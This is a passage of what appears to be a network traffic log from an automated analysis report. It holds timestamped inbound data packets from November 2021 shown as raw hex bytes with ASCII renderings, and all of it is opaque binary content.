39 57 9c 6c 4a 32 48 2f 64 a2 de bc 86 8c 83 99 Data Ascii: @tB&[a-%Rb1j7=M"eBEc9ZL+$&GL\9}!QLDYXm\|Uew7ZR7VvNUT,B+\;BuOS+s55A'To{>$)u?tD0UF4yTD)glB;o/-9WlJ2H/d
2021-11-25 15:51:21 UTC	109	IN	Data Raw: 19 5d 1d 9a 9b 42 86 f2 0c d5 c8 b6 ad 5b 6c 23 00 cb e8 98 32 ca 97 60 62 09 c2 73 a5 56 06 33 ef eb fb 57 92 b6 e9 3a 06 57 16 5d 4c df 09 1a 76 17 d4 d2 a3 7f cd a7 31 58 e8 65 db e0 1c 24 2f 9c d3 d0 39 51 94 b2 52 ea 23 a3 c6 13 a9 dc bb 2c ff cf c9 07 3f ad df 49 ab e2 7d 55 bb 0f 2f 72 26 1c 1a cc 8d ee 09 fd e2 0f ee 61 5a d2 a6 8a 63 12 1b f3 eb b7 7e 29 27 d9 48 87 cf 32 51 45 4a 6d 04 53 0b c4 86 78 6e 93 9b a5 37 b2 d8 e6 47 6a ff b6 ec d7 19 a4 70 9d 8e 5c af 2c a5 9e 22 3c 2f 8e 40 25 8e ba f0 86 06 59 0a a0 3e 2b a4 3c ba f6 72 ff 85 f8 58 d7 33 37 8d fd c9 0d 17 8e 21 89 4b 39 dd 96 08 99 d3 3e 4e 42 d1 c4 ee 8e 0e 5a ee 6b 00 a2 b2 f2 0e 1c 4d 77 95 b8 e6 e3 c8 95 d8 aa ed bc 94 69 8e 23 f1 ab 50 c1 49 ab 22 86 13 ee 6d 38 c1 7f cd f1 fe Data Ascii: ]B[l#2`bsV3W:W]Lv1Xe$/9QR#,?I}U/r&aZc~)'H2QEJmSxn7Gjp\,"</@%Y>+<rX37!K9>NBZkMwi#PI"m8
2021-11-25 15:51:21 UTC	110	IN	Data Raw: 86 7d ca 76 f8 21 10 c9 07 7c b1 f9 a9 50 bc 01 fd b6 fc 66 68 4e c9 e4 bf 67 39 ac 32 eb fb 72 49 7f ce 5e 95 78 cb f2 ce bc 0f 2b ac b2 30 8e 24 6a b5 44 58 71 bc 16 10 dd b0 53 e7 d3 be bd 16 18 75 6f a9 8a f4 ff de d2 2b 69 8a 67 e4 ac 4a 4c a1 5e 59 f5 70 c7 1d f3 d8 aa d9 99 07 d5 1c b6 09 c9 94 ba 35 a6 e7 ce b6 fd 42 85 31 ed 5e 01 e7 6b ee 51 97 19 08 21 d7 88 fd 72 55 f4 d7 33 25 d1 b1 02 01 00 8c 60 b2 0e 53 4b 47 ab 34 07 ef 1c ec d7 f1 07 ca 17 2f 0b 17 51 7d 68 2d 5e 7c c1 ae 97 d4 2d f8 c8 b0 c7 2d 59 78 f6 98 d9 79 3f 45 5a 08 32 d7 b7 42 7e d6 52 12 c6 51 64 2b 92 21 84 97 10 68 a1 29 05 04 a3 50 7d 29 7a c4 9e 2d 67 8e ea fe 90 27 f6 93 14 b5 8d 63 01 63 f6 99 6a 47 c0 d5 30 e0 d6 54 7e db e8 1b 72 3f 35 5a 1e fb 6b cb 83 04 34 9a 40 1b Data Ascii: }v!\|PfhNg92rI^x+0$jDXqSuo+igJL^Yp5B1^kQ!rU3%`SKG4/Q}h-^\|--Yxy?EZ2B~RQd+!h)P})z-g'ccjG0T~r?5Zk4@
2021-11-25 15:51:21 UTC	112	IN	Data Raw: a6 45 7a c9 02 bf 52 f0 67 61 db e4 4e e4 a8 d1 0a a6 22 63 0e 0a ad 0b 4a 88 68 87 ed 00 be df c5 d5 1b f3 c2 0c 98 02 d6 80 d0 be dc 56 e9 c1 79 37 b8 c2 99 bd 65 16 14 56 fe 55 66 88 7f 30 f9 ae fc 1d 72 91 ac c1 34 94 35 be ef d0 8d fc d4 a9 4e b5 02 8c 49 70 ad 6b 3b ac 36 2d a9 b1 d2 b1 b6 92 1d 18 f7 e2 cb ff 84 75 62 23 e5 a2 bf 69 d0 5c 18 49 48 f5 9e 0f cd 33 70 d8 22 5a e6 75 db ea 21 8a 3a 05 0b 72 99 96 e0 5c 66 72 a9 50 41 e4 41 37 6e ac 38 59 57 56 e9 c4 98 3a 53 ab 29 7c b9 4e f3 de 52 cd 1f a8 d4 cb 43 61 33 94 e1 4f 8e f3 e8 4e 54 67 06 df 44 ef e4 56 08 a4 c2 66 02 b3 42 d3 0d 40 6f 14 6c 51 7a 5e 94 34 03 cd f1 1a 79 2b 70 a9 54 b6 13 94 36 eb 96 85 e2 7d c7 9b 5b 45 d0 d9 7b c8 16 da 51 30 97 73 85 fc cb 1a ae f6 ba 08 40 cf 0b c1 9a Data Ascii: EzRgaN"cJhVy7eVUf0r45NIpk;6-ub#i\IH3p"Zu!:r\frPAA7n8YWV:S)\|NRCa3ONTgDVfB@olQz^4y+pT6}[E{Q0s@
2021-11-25 15:51:21 UTC	113	IN	Data Raw: 50 7b 23 f6 28 82 9d 5d 2a 50 58 dd d2 8d 0e 38 32 03 2e b1 bb 53 93 c2 30 c2 74 29 ac 69 04 5f f6 16 db 59 3f 4a c8 b5 79 22 84 4a 30 98 d8 48 ae fc 89 aa 36 08 af 76 bd 9f b1 d6 f6 cb 04 80 44 22 74 9e 0f b9 d2 52 cc 09 a5 29 7e 1c f9 f3 d8 a1 06 05 aa 3c 7e bc 1a 48 2f d5 1e 87 9c 9c 0d df 97 0b 43 e2 74 9a 01 35 33 7d 23 e4 c3 54 6d a9 53 49 a3 54 cb e4 54 c7 eb 90 aa 01 ad 68 b2 f3 e6 c5 ec 8a 34 80 17 f2 e6 4f 72 4b ab 61 eb 65 44 5c 61 f3 df 5a 4c f3 69 66 28 5d 11 d0 6d 24 85 e0 c8 68 df d2 9b a0 de 42 22 3b 3a 2a e8 9d 8f 37 b7 80 ca be 64 32 0f 54 b6 77 8f 9e 3a e7 d8 5e f5 96 f1 83 fd b9 18 a6 44 25 a7 20 66 4e f3 1d 65 e5 9f 5b f6 17 3c 7e 73 bf 9f 13 52 70 26 84 91 da 23 ab 74 30 0b 1c 9a 81 f6 91 0c 5e 71 18 d2 e9 da 33 85 f2 99 70 91 78 af Data Ascii: P{#(]PX82.S0t)i_Y?Jy"J0H6vD"tR)~<~H/Ct53}#TmSITTh4OrKaeD\aZLif(]m$hB";:7d2Tw:^D% fNe[<~sRp&#t0^q3px
2021-11-25 15:51:21 UTC	114	IN	Data Raw: 9a 35 5e 77 f4 1a 7b c3 89 69 7e 1b b1 71 22 f8 96 fb 73 dd ea 79 e5 57 ed a5 fe 3c 2e 30 e1 2f aa e4 49 48 38 2a dd 2d 8e a7 df 09 ef 44 da 40 c3 d1 1b c7 1d fb 79 32 62 25 b3 a0 20 b6 8d da 99 b5 f5 c3 08 a3 94 00 70 b7 7a cd e9 de ab 5d 1a 7a db 5a b1 5a d7 17 f3 11 3e ce 5c 96 0f da 55 7f fb 15 88 7b cf 0b 2e f4 f2 94 32 3c 1a cc dd fe 0b 18 49 b3 ca fc e1 82 fb 89 ee 27 21 a8 d4 93 19 32 f7 66 b0 ce 89 7c a4 d4 80 d6 ed da a2 23 e6 a5 39 83 6b 76 cf 08 97 be 00 68 cd 9d 40 c9 f2 63 35 b2 42 5a b0 64 82 46 d0 55 f7 a9 a0 53 bb b6 fd 71 76 fb 0e be 00 be 01 66 6a b4 fd bf 84 3c f2 0d d0 5e 90 fd bf 1b 9b b9 ec 26 ab 51 7a 5f f2 00 b1 ab 4e 54 61 f2 51 a5 01 3c 29 ac ce 22 ef a3 0c a6 2d 92 f1 f7 ad be f3 48 96 b9 80 41 a3 48 fa bd 9c 09 e7 34 f2 73 26 Data Ascii: 5^w{i~q"syW<.0/IH8*-D@y2b% pz]zZZ>\U{.2<I'!2f\|#9kvh@c5BZdFUSqvfj<^&Qz_NTaQ<)"-HAH4s&
2021-11-25 15:51:21 UTC	116	IN	Data Raw: 5a d0 b8 c3 4e 8c 9b b1 79 3e 47 66 63 62 86 91 a9 53 70 a6 dd 34 4c f8 2f ba 12 a5 d8 a9 5e 91 1c fd c3 d6 a9 52 f6 e3 d0 be 03 28 12 a2 70 a9 6c 89 03 4b 8b df d6 95 0f 34 e4 37 b1 44 e3 5a 0f 21 6e 9d 84 42 45 db 83 d6 f9 96 0c 51 65 36 d8 45 d4 a7 96 0f 04 ae c6 66 9f 8c 67 37 35 f8 9b b9 4d 42 27 c1 9b b3 79 dd 3f 58 66 8a 54 f4 87 7e d2 4b bf 81 1e 97 02 b9 49 46 40 a6 a4 67 31 c1 17 f7 1c 8d 73 7d 50 1e fb 77 38 72 ae f1 e5 49 a3 53 3b 39 32 8f 6c 37 f7 69 b9 27 b7 d2 7b c8 bb 87 e0 99 68 a7 05 ae 23 0a 28 16 7d cc 0c 27 bc eb c2 ab 52 0c bb 58 79 59 99 cc 1c 6d db 3a a9 55 6e 94 b9 bb fa a7 96 f0 96 44 da 97 8e 9d 59 91 cd 82 f3 64 60 b4 8a 59 66 bd ee eb 60 02 e3 a9 1b c3 14 ab 72 31 8f a3 a5 47 44 16 a8 bd d6 98 81 6c fc 15 f5 a6 15 27 88 51 f9 Data Ascii: ZNy>GfcbSp4L/^R(plK47DZ!nBEQe6Efg75MB'y?XfT~KIF@g1s}Pw8rIS;92l7i'{h#(}'RXyYm:UnDYd`Yf`r1GDl'Q
2021-11-25 15:51:21 UTC	117	IN	Data Raw: 2e f8 0e 5e 67 b8 77 dd 66 b6 4e 08 98 0d 2a 90 5b be 34 03 0c 4c a5 94 a2 33 84 4f 78 a5 5c 88 57 66 bc 65 96 4f 61 09 11 d8 43 d8 41 a8 8d 70 5b f5 f4 87 1c e3 84 cc 4f 47 6b 49 ac 53 44 5f 9d 46 56 b1 55 94 6c b4 c9 0a a7 9d b4 c2 88 8f 8d 64 86 7d c3 ea f4 42 2d 12 0a 58 64 c4 61 97 ce 52 62 c7 55 3a 69 00 fd 64 9d 24 8d 80 44 37 87 c7 25 dc a9 cf 30 d4 30 93 ed 13 cf 3f 9a 0e b5 80 40 a0 87 f6 fe f1 d6 3b 0d a8 49 d6 e7 f0 33 8c 6b df b1 d0 73 aa de 6a 56 9e 3e 18 4f 8f 26 e0 8f 1f f3 9d 58 82 02 83 f9 61 a0 a8 03 30 eb 97 b1 45 59 b3 61 47 55 56 dc f3 32 e4 be e6 f3 e5 46 66 8f 74 22 2f 15 2d e2 10 25 dc 67 9a 8f 06 4a 38 07 ae 5d 94 99 67 8f 9a 61 fd c8 b7 89 8e 24 20 d8 e7 fb b9 99 eb 27 00 e4 e8 72 4d b9 ed 3a 27 4f 70 4a 23 ef 11 d6 56 77 e4 de Data Ascii: .^gwfN*[4L3Ox\WfeOaCAp[OGkISD_FVUld}B-XdaRbU:id$D7%00?@;I3ksjV>O&Xa0EYaGUV2Fft"/-%gJ8]ga$ 'rM:'OpJ#Vw
2021-11-25 15:51:21 UTC	118	IN	Data Raw: 01 5a e5 fb 82 e6 12 52 cc 87 c7 04 30 37 b7 46 66 19 79 1e c5 e5 2f 71 72 a3 a3 96 42 9a 4f 46 e5 25 92 5e 9d bc ed 04 aa 19 46 ec 12 5e c9 59 3c 25 d0 16 4f dd e4 ea 8d 89 0b 64 b2 c6 ad 14 38 6f 17 c6 a1 bd 09 cf 5f 21 6a 43 a5 ff 86 44 de d5 62 e3 91 e8 7e a8 ff 70 e4 74 a5 9b 59 04 bd fd d7 9d 8c 5e 99 7a b2 9d b8 ca 87 6c f5 e6 0d 23 d0 57 7e 4a 2c f7 98 00 1a a1 d8 e7 bf 61 09 be 0c 4b 00 88 62 8f 1b b1 b7 31 b2 fd 77 2a e6 18 7f cb 06 52 95 b2 57 2d 72 ee 54 ff 32 3c 9a 34 fd a7 f8 2d ab 60 18 d8 eb 3b ed f7 a2 c4 37 87 75 9d 32 52 fd b6 1d 9e be e3 df 46 20 83 bb 5b 10 65 8f 10 1f 05 7e 7d c6 76 a6 df 93 a3 ae f6 ea 1d f2 ef b1 bd 26 6b 31 78 d3 39 36 7e 98 46 e4 4f 8d f2 61 07 2b 11 31 6d 04 24 91 7c 1d f2 5b 11 54 b1 c4 d8 a7 9a e4 6f c8 c1 22 Data Ascii: ZR07Ffy/qrBOF%^F^Y<%Od8o_!jCDb~ptY^zl#W~J,aKb1w*RW-rT2<4-`;7u2RF [e~}v&k1x96~FOa+1m$\|[To"
2021-11-25 15:51:21 UTC	120	IN	Data Raw: 07 70 f2 3b ac e9 15 db db 4f 87 94 81 62 c0 0b cb 08 a6 cb 63 99 6c dd 79 e1 2a 94 ed 1b ff 1e e0 68 db 5d 8c 70 a7 9d b6 c4 11 2d d1 b8 e0 f1 3a 33 62 fb 27 68 24 f6 e2 12 b2 85 65 3c 22 65 88 c3 d6 4d b7 04 07 32 82 32 3d e8 48 f7 4d 2f 36 36 38 38 0b e6 5e 1b 06 92 62 80 79 dd 57 09 d6 e1 f6 1b cb 06 40 c8 87 0c 5e 91 79 29 a4 34 fe 7b 3c 25 e6 75 61 f8 f8 3c 12 6c 82 36 51 22 63 37 51 c0 da 0a a7 1a 90 e5 26 1f c9 08 a7 29 10 06 fd 07 06 b5 8f 66 b9 c3 1d 06 48 8c e7 28 9c 4e 66 33 bd d6 9f 15 f1 d0 bd 66 28 13 79 dc f1 e4 cb ee 86 07 0c aa db 49 fd 85 66 cb 2c 79 e8 4a 23 82 fe e6 24 c4 9f 38 d3 75 52 e3 2f 10 1d 50 f3 41 66 17 55 26 83 92 1a 7c ad 31 b4 eb fb 80 48 f4 92 f2 30 89 f8 10 f1 76 92 24 69 f6 17 8e 42 ee 0a 1a 63 82 90 50 03 7d fe 3a 0e Data Ascii: p;Obcly*h]p-:3b'h$e<"eM22=HM/6688^byW@^y)4{<%ua<l6Q"c7Q&)fH(Nf3f(yIf,yJ#$8uR/PAfU&\|1H0v$iBcP}:
2021-11-25 15:51:21 UTC	121	IN	Data Raw: 20 17 fc ec 54 01 09 2c 22 68 2f 0f 80 8e 4b 70 ab f9 1c 48 cd 0e a7 4f 42 d7 27 eb 7e ac 26 61 80 c2 cc 68 be db e4 b6 75 d3 bb e8 32 e6 29 e4 44 3d b9 a0 84 40 c0 12 5c ad 6d 08 0f ea ff d0 22 3a 3e 19 2e 6f 1e 9f 59 86 7c 4a f2 67 85 66 cb 5b 50 c0 d7 94 89 d2 80 4a 2a 6f 53 75 d7 27 67 e7 2a 19 4c 47 0c 42 ec 45 54 09 34 9d 12 5a 19 24 56 e1 c0 ea ef 07 ba f2 ea f8 45 73 1f c9 31 7e 5f 12 be 8a c2 49 b4 1d fa 1f fb 82 ee 30 1a 15 c4 a2 d3 42 42 e8 4a f4 2c 0f 43 a2 cb 38 3c 23 e1 58 67 49 2f c2 90 20 9d de 29 01 1d fc 3d ae c0 65 e4 10 d7 34 ef 0b f9 a6 15 c5 9a 83 a6 63 34 36 3a c8 92 22 f1 82 40 21 d1 39 3d 47 04 34 1d 88 28 ae cb 75 5d 04 22 98 5c 80 ce 54 b3 cf c1 ba cb e3 a4 02 8b d1 3f 9b 1b 50 0d 39 ce 8b d1 0a a7 11 5c 09 a2 79 bf f7 92 2e e6 Data Ascii: T,"h/KpHOB'~&ahu2)D=@\m":>.oY\|Jgf[PJoSu'gLGBET4Z$VEs1~_I0BBJ,C8<#XgI/ )=e4c46:"@!9=G4(u]"\T?P9\y.
2021-11-25 15:51:21 UTC	122	IN	Data Raw: 3f 5f 13 20 6f 2e f3 ed fb 88 61 0d 2a f3 b3 7b cf 09 db e4 7f 6a b4 16 05 0c 47 b5 d6 97 c5 26 8c 9d 86 93 78 6b cd 33 84 c4 2c e5 f8 de a0 67 d8 a6 1c db 15 23 11 b2 00 b8 f7 ad 31 09 da d4 e5 11 d1 01 89 03 c3 b8 f0 f7 d2 94 50 f3 e1 3e c2 89 26 56 d2 40 4b 7e 4d 2f 4f 3e 92 e0 de bd 5d 94 61 36 34 02 87 72 15 3c b3 d2 4c 93 06 aa c4 9f ba f8 12 f8 21 66 32 e1 f7 d2 6e aa e6 4e 04 db da 36 5f 2c 29 95 b0 44 7e ac 51 fe ec 37 23 fa fe 37 86 d2 22 8a 96 41 80 75 db 2e 3c ea 9a 9a 3b 2e e8 9d 35 4e fc 3c c2 76 6a 3c d1 db 6c 8a f0 3d 26 2d 9e 08 4b 30 6e 67 0a 93 7b 3b ac ec 26 f4 fa ee 21 37 8f 9a 84 9b 3e d6 93 07 76 9a 58 e8 74 45 a9 35 66 8a 5d 11 30 05 da c9 8f 5f 70 1f 00 77 3b 9a 8d 8f a5 aa da 9a 82 cd f0 f6 8a 90 4e 6b 2f e1 86 88 7f 3f 30 a7 a7 Data Ascii: ?_ o.a*{jG&xk3,g#1P>&V@K~M/O>]a64r<L!f2nN6_,)D~Q7#7"Au.<;.5N<vj<l=&-K0ng{;&!7>vXtE5f]0_pw;Nk/?0
2021-11-25 15:51:21 UTC	124	IN	Data Raw: c5 ff 8e 1f f3 de 5e 8b 00 8a 50 f1 db d7 91 68 4d 7a 11 fd c8 b1 70 1e 78 af cb 37 39 4b ae 52 03 35 b7 f0 2f a3 ea 7a 5d b6 c7 e1 24 5f 8c 83 82 d8 11 2b 91 ac 53 38 cc d7 21 ec d2 88 9f a6 2d 02 4f 6f 7b 1d c4 99 d7 16 77 da 9f 56 fb 50 63 87 75 23 a6 ab 30 bd 62 19 91 a3 a7 97 8e fc 11 e8 e7 4c 42 30 4a 43 46 87 2f e6 c0 12 09 bb 9f 1d fa e3 a4 0e 64 b6 f9 92 b3 7c a2 c9 34 90 8b af 0d 50 fe 3e d7 4d 4e 79 44 c0 0b ab 61 f2 aa e7 2d 68 8f 5a ea 7f fb 87 49 4f a3 9d ba c7 2d 36 bd 8a 0b 89 68 54 01 95 05 b7 f2 f3 ab a5 9e 32 3d 59 06 b4 79 44 c0 28 19 fa 2b e9 54 c2 55 58 db e9 f3 56 7c b5 1d 4f 7a b5 97 08 32 96 8f 0f 96 3b c5 1a 4a 3f b5 4f e6 c1 0c d0 21 2b 38 52 09 e3 d0 47 d2 b2 5d c8 af c7 90 f3 ae 2b 7c 4c 2b 37 34 39 88 59 67 bc 78 bc 0c 97 72 Data Ascii: ^PhMzpx79KR5/z]$_+S8!-Oo{wVPcu#0bLB0JCF/d\|4P>MNyDa-hZIO-6hT2=YyD(+TUXV\|Oz2;J?O!+8RG]+\|L+749Ygxr
2021-11-25 15:51:21 UTC	125	IN	Data Raw: 2d 30 13 4e 1b ac 47 ba 4e c8 77 31 c2 ab 58 ec 85 90 d3 bb 6c b8 cc 2e d9 b7 db 65 ac e5 c2 19 d8 53 a3 35 be ed ff 8d e2 7b 81 ad 04 8d d8 59 35 51 1e 72 45 62 2e 81 4a 4e 79 56 aa 60 5a e3 f0 d1 e3 c3 1b cb 92 86 2d 0e 8c 64 86 ff 0a fb c2 c1 14 5e 70 b7 fe 82 e3 40 48 aa e3 04 8e e0 d6 99 26 e7 3a 77 4e 15 6a 8b 74 b4 14 38 0d 2d a8 df e1 cf 07 6f 70 ff 82 72 4d 58 e1 29 73 74 97 81 fc f0 0f 6f 10 c5 45 a4 80 43 6c 23 af 93 e6 7c 4f 8e 0e 69 8b dc 96 08 94 85 b6 4d 1c 49 4b b3 2b a8 21 03 09 19 c4 ac 5f 94 1b b6 9c 0a f0 22 03 b9 80 1e e0 a0 b0 c6 69 d9 67 36 05 35 2b a7 ae 57 52 fa 99 54 e7 22 89 d2 6e 99 7c 51 df f1 61 01 40 14 0d 18 a1 da 72 ac d0 8e 16 b0 7c 87 c9 de 38 d0 43 5d a1 cf b2 fa ab 68 90 17 c2 14 b7 8b d8 4d b8 c4 7e 99 d4 da e9 fd bf Data Ascii: -0NGNw1Xl.eS5{Y5QrEb.JNyV`Z-d^p@H&:wNjt8-oprMX)stoECl#\|OiMIK+!_"ig65+WRT"n\|Qa@r\|8C]hM~
2021-11-25 15:51:21 UTC	126	IN	Data Raw: da a3 2f 1f bc ff ba ca be 0c cc 5a 01 66 62 6b 3a 9e a4 c7 77 77 d9 b5 e8 3d 7a 45 69 0c 48 a7 a5 c1 21 e0 6f 2f 12 bf 24 e3 af af 2c a0 03 df 6e 9a 35 08 a3 2d 1f a9 cf 23 e2 4b b3 50 c1 db b2 4f 99 d8 20 12 95 73 e6 13 4e 1b ac 20 3b ab bf 85 63 9b 38 b3 53 97 83 f8 2f 8e 12 4c 07 04 b8 ce 47 5e 9b 15 f7 70 a5 a4 85 cf d1 ce 2a fc 03 7b c4 78 b6 7e bb 66 71 40 1f fa 15 c2 68 36 0d c3 1c 4a 7a 60 74 f9 75 74 a9 bc 7d c1 b2 f3 5e a1 a8 d3 32 88 91 64 83 61 b5 74 1b 7b c6 9c 32 99 17 9b e6 2d a6 1f 16 54 6e 5f 75 66 b6 77 52 22 00 07 cf 70 23 8c 84 e6 c5 e8 97 ba 6e 1e 79 63 02 42 26 68 3a db e2 f9 a4 97 b7 c7 25 72 2f 14 df 8a 6b 4a f4 10 a8 c0 2b 55 3e c3 02 83 d3 54 71 af d0 5e fe fe 51 e3 d3 ea be 7b ba b5 f1 c7 b0 e3 cb 7e ef ca 55 ba 72 56 b7 ef 71 Data Ascii: /Zfbk:ww=zEiH!o/$,n5-#KPO sN ;c8S/LG^p*{x~fq@h6Jz`tut}^2dat{2-Tn_ufwR"p#nycB&h:%r/kJ+U>Tq^Q{~UrVq
2021-11-25 15:51:21 UTC	131	IN	Data Raw: 25 13 ce 4a 34 f5 9c cd 3d 52 91 28 d7 c2 ff da a2 53 71 c0 ee cb a4 de 94 c0 43 da c2 6c 5d 8a 5f 29 96 37 b7 46 36 8d d3 d2 b0 7a 65 67 de 54 fc 32 ec 6d d5 a7 97 8e 8b 63 c9 6d b3 bf 26 e3 de bc d8 36 a3 25 b3 6d ce 87 cc 7a 4f 7f 37 16 46 dc eb b8 07 9f 25 ef 58 ba 1e cd 98 09 9e 6e 54 4c 4a fe ae 85 1c d2 23 ed 46 c9 e6 eb 24 61 a0 5a 09 96 d9 16 fe 1c 85 55 ac ee ce a7 41 e1 1e 49 eb 96 ec c9 ca 8a dc 29 27 3a d4 4f 61 a2 1b 75 b3 b8 99 8b a8 70 c6 91 9c d3 b0 a8 7c 72 34 40 f4 72 99 b4 19 29 80 de c6 d4 38 5f 2b 99 61 1b 73 c5 e8 73 ce d4 a3 46 60 af 76 6d 83 1a cf 79 37 39 88 11 32 fb b4 66 36 0c 14 6f aa 40 72 7d 5b 1a 76 a8 cd 89 2b d5 c2 80 7d e8 6b af ab aa 3e a5 2a e6 5f e7 92 8c 0b cb 39 99 e7 33 f7 ec d3 e3 57 ef 03 7d 30 49 92 90 86 e3 36 Data Ascii: %J4=R(SqCl]_)7F6zegT2mcm&6%mzO7F%XnTLJ#F$aZUAI)':Oaup\|r4@r)8_+assF`vmy792f6o@r}[v+}k>*_93W}0I6
2021-11-25 15:51:21 UTC	135	IN	Data Raw: b2 39 ec 9b 49 11 3e cf 0e ac 39 cc 7f 3e 2b 2a f6 fc 05 d3 d2 e1 fb 8d d6 63 6c 34 6e 4b 0d 25 e1 ce 83 ef 0c e6 4b 45 59 6d 87 10 b7 3e c1 e6 4c dd 41 5e 66 99 86 d0 f1 72 a2 c6 69 a1 24 eb 7f 86 69 36 39 85 15 27 dd 2a 68 b6 fb 8a 5f 86 f1 b3 6b 26 60 ac 39 54 c6 ed fe 04 4e e3 5d 8d 70 f6 e3 e1 f8 13 20 96 38 04 bf 5f fe 98 cf de 45 6a 20 3d 1e 14 65 3c d0 4d 41 5e aa d6 01 0f 24 96 47 cc 00 c3 59 1d fb b4 19 e1 ca bf 51 77 4d 1f 76 7d ce b0 f0 0c 57 8d da 9d b7 71 c2 60 ae c7 19 f6 93 c1 f4 6d 06 8e f4 e1 fc 07 32 3b 32 86 f2 35 2b fd b3 40 c6 f1 3c d5 33 32 07 83 f4 92 51 99 d3 08 a3 47 45 63 82 fc 99 63 59 e9 91 05 05 ac 0c 95 e0 49 c8 36 33 ec 21 c7 17 94 9c d2 f1 0f 99 ab 51 76 6e 3c bd f7 24 63 02 b3 4a 2a ee d3 3a 3b a1 10 59 e4 5c 7e 46 e6 7b Data Ascii: 9I>9>+cl4nK%KEYm>LA^fri$i69'h_k&`9TN]p 8_Ej =e<MA^$GYQwMv}Wq`m2;25+@<32QGEccYI63!Qvn<$cJ*:;Y\~F{
2021-11-25 15:51:21 UTC	136	IN	Data Raw: 34 03 fe 66 12 fa e6 ac 95 33 7e 6b 38 35 bb 54 b7 f9 e8 73 2b 5a 8f 22 50 f3 d7 11 42 2e 20 7b f7 97 88 ef 4a 22 95 83 f0 62 b6 bc 14 60 90 15 1b e1 62 b3 7e 70 ac 57 8b 0e b6 fe 3c 21 63 bb 8a 8d 13 e6 47 6e ef 23 c5 29 ac 37 04 bd d3 30 b3 cb e1 58 8a ea fa 41 e9 82 46 d0 05 30 bd ef 16 ad 17 5c 02 f3 69 40 24 52 15 d0 4c 7e 71 92 91 75 26 6a 8b da 99 1b 76 05 d6 df d4 a1 05 36 91 0a 41 7a 6b 3d aa e3 44 58 b6 35 8d dc 61 fc e3 2f 88 61 0a 3e 75 29 ee 65 0b 1e 16 cc 61 f4 e7 f2 58 df 4c 8f 2c 32 0b 1b 17 77 ef 46 dd 5c 70 d9 dd dc 60 91 13 82 51 55 6d 0a 5a 09 ce ba ff 81 68 ec eb 83 f1 e9 95 0a 9e 3e 18 a1 c8 52 55 b3 6a 53 cd 08 ae c0 51 d4 09 ee 47 5a df da a3 1e ef 02 40 d2 86 4e c5 8d ac e9 8b e8 75 3c 69 db c3 2d 27 01 2f 66 74 9c 37 80 ed cd f2 Data Ascii: 4f3~k85Ts+Z"PB. {J"b`b~pW<!cGn#)70XAF0\i@$RL~qu&jv6Azk=DX5a/a>u)eaXL,2wF\p`QUmZh>RUjSQGZ@Nu<i-'/ft7
2021-11-25 15:51:21 UTC	140	IN	Data Raw: 4e 01 8b 75 72 a4 bc 7f 96 a2 0d 17 cf 86 7b 40 b3 05 bd 59 6d 38 d3 d8 a5 37 07 04 17 f4 82 ef b2 00 88 6e a1 5d 01 9c be a3 90 65 0a ab 8c f3 61 9c 73 fc 7e 7c 7b 2c a3 95 6f 36 c6 04 00 81 42 d3 b1 cd 5f 2f b7 74 98 fa ff 02 59 ff 0c 4e 1f 25 74 2c 86 ef 6a 38 67 ae ca b3 41 bb 0d f6 8e 82 e3 5e 8e 1a f3 28 49 19 bb 2d 11 24 ef 03 7d 2e 4c fb bc de 6f bc 75 10 4f d9 5c 98 0a 97 1b 06 5b 22 6c 8f 92 9b 1c 94 e9 fa 1a 79 ee 3c bd 44 ee 69 d1 cc b4 02 18 71 ca 27 d1 da c9 3f 55 6c 3a 3d 5f e4 43 6d 0c 1e 4a 70 97 6f 43 6c b1 4c ff 05 bf 35 50 d8 99 87 0b 44 d3 9f 5e b7 47 55 68 b8 ce 1b 60 2f 82 c2 a2 df 3e 20 70 92 28 94 91 dc f6 6f 23 ea 99 e3 f9 39 be 0e b3 40 2a 1a 7a e7 15 5b 56 53 05 0d 16 a1 c7 2b 7e 6b cc 80 45 57 62 0f 5c d6 7d e7 fe 0a 0a 90 b5 Data Ascii: Nur{@Ym87n]eas~\|{,o6B_/tYN%t,j8gA^(I-$}.LouO\["ly<Diq'?Ul:=_CmJpoClL5PD^GUh`/> p(o#9@*z[VS+~kEWb\}
2021-11-25 15:51:21 UTC	144	IN	Data Raw: 7e 86 fe 05 2c e1 d0 04 16 b6 10 54 02 82 95 00 89 7e ad d9 5e 15 72 a1 28 fe d8 98 3d ce 48 db 77 36 c0 10 77 10 3b 01 d4 15 02 25 b4 8a 8c 59 61 eb 95 b4 2d 8e a9 57 a3 c1 a2 c8 8d 00 12 2b 1b bc c8 62 8e 29 7b 24 1f 07 a3 d5 dc 18 b5 7c 8c ee ee 96 35 07 ad 14 bc 1a 4e fd 7f d8 99 7e e2 92 2b 7d ff 82 09 1d f7 30 2f 71 d4 a4 ca be 09 a7 af da 9e 60 61 bd 65 f4 e0 62 76 6d ca 08 a8 4e c0 b2 2e fb 07 3f b4 66 01 62 b7 79 e6 42 43 ab 1e e0 49 a2 b5 d5 3e a2 c9 45 a9 17 a9 6c bc d4 2b 09 84 a1 5c 63 ed 5a ef 61 1c 9d 4b 78 13 b2 25 df db 3a dc aa 64 8a e6 1e 81 8a 5f 12 a7 0c 92 f6 96 e0 d1 da 80 db 5d 53 0c 4d 7f c8 7e 07 c5 7c db 25 ae 69 3c a1 36 de 06 3c 3d 28 be 47 a7 2c a7 1c 45 e2 79 40 b3 1c 90 d0 be e8 9d 1d f6 ac d4 7d c0 dc ee 59 d3 0d a5 3a c0 Data Ascii: ~,T~^r(=Hw6w;%Ya-W+b){$\|5N~+}0/q`aebvmN.?fbyBCI>El+\cZaKx%:d_]SM~\|%i<6<=(G,Ey@}Y:
2021-11-25 15:51:21 UTC	148	IN	Data Raw: d3 3d ab aa 32 4e fe 07 04 36 5b e3 f4 1b f9 9d 65 02 86 0c ee a2 85 fc 08 5f 4b bd 9f 89 1c 1a 46 14 ef d2 ba cd a7 32 e0 c6 a8 35 83 74 20 96 f8 54 c4 ae cf b9 e3 98 c8 21 d9 24 82 8e 2d 3c 12 b2 32 2b 0f 3b 35 3c 1b 79 8f 19 71 10 5e 66 63 30 a1 a0 9b 21 63 8f d9 00 8b e9 f9 65 19 13 27 ff 3a b4 6e 31 ca 65 7f cb 03 d2 d1 0f 5e 1e 13 d8 a6 15 c5 8f 73 7b 54 93 04 38 ee 75 54 0b 65 9a 1c 14 d7 c2 d1 c1 55 c5 c2 fc 8c 9c b9 7e d3 cf 80 70 58 6b 0c 6d 2f 1e 9f 15 f6 fe f2 8f 63 f1 1c 9d 51 8e ec 99 ac 2c f4 3a c4 65 72 4e 1e 5a 57 88 8b 94 e6 a7 d9 c1 fb 9d 44 3b c7 ef 15 84 97 79 8c 8c 85 